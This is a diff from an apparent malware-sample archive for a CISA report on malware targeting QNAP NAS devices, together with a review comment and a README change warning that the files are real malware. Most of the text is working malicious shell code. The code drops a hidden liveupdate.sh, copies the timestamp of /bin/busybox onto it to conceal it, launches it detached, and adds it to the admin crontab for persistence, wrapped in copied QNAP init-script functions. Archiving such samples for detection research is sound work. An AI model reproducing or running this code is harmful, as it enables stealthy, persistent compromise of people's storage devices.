_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "${bdir}/.qpkg/.liveupdate/liveupdate.sh" || chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
crontab "$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
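Review bot: This sample is committed as a bare hash-named text file with no analyst note beside it, so a reader has to walk all 568 lines to find what matters for detection. The sample should stay byte-identical (its file name looks like its SHA-256), so the note belongs in a sidecar file in the report directory rather than in the script. I would list there the host artefacts visible in this section: the dropped `${bdir}/.qpkg/.liveupdate/liveupdate.sh` and `.rsakey`, the `touch -cr /bin/busybox` timestamp copy, and the entry appended to the admin crontab and `${confdir}/crontab`. The network artefact to record is the `curl -k` request for `/qnap_firmware.xml?t=<epoch>` sent to date-derived hostnames under the `DOMAIN_EXT_A`/`DOMAIN_EXT_B` suffixes. The here-document also appears to wrap the update loop in fragments of stock QNAP init scripts (the `cloudinstall` case block and the Qsync functions) that only run when `fromrcS` is `TRUE`; this is inferred from the listing and should be confirmed against the CISA report before it is written down.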
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
Normal file
File diff suppressed because one or more lines are too long
@ -4,7 +4,7 @@ ATTENTION: This repository contains actual malware, do not execute any of these
|
||||
|
||||
They have been renamed for easier processing.
|
||||
|
||||
This is an ongoing and updated archive of files that we collect which are associated with specific public reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
|
||||
This is an ongoing and updated archive of files that we collect which are associated with specific public malicious threat reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
|
||||
|
||||
All of the malware samples contained in this repository has been collected by various locations. This repository is designed to try to stay up to date with various public reports and to make the process of retreiving the files associated with this reports (tied to the published IOCs) more easily.
|
||||
|
||||
|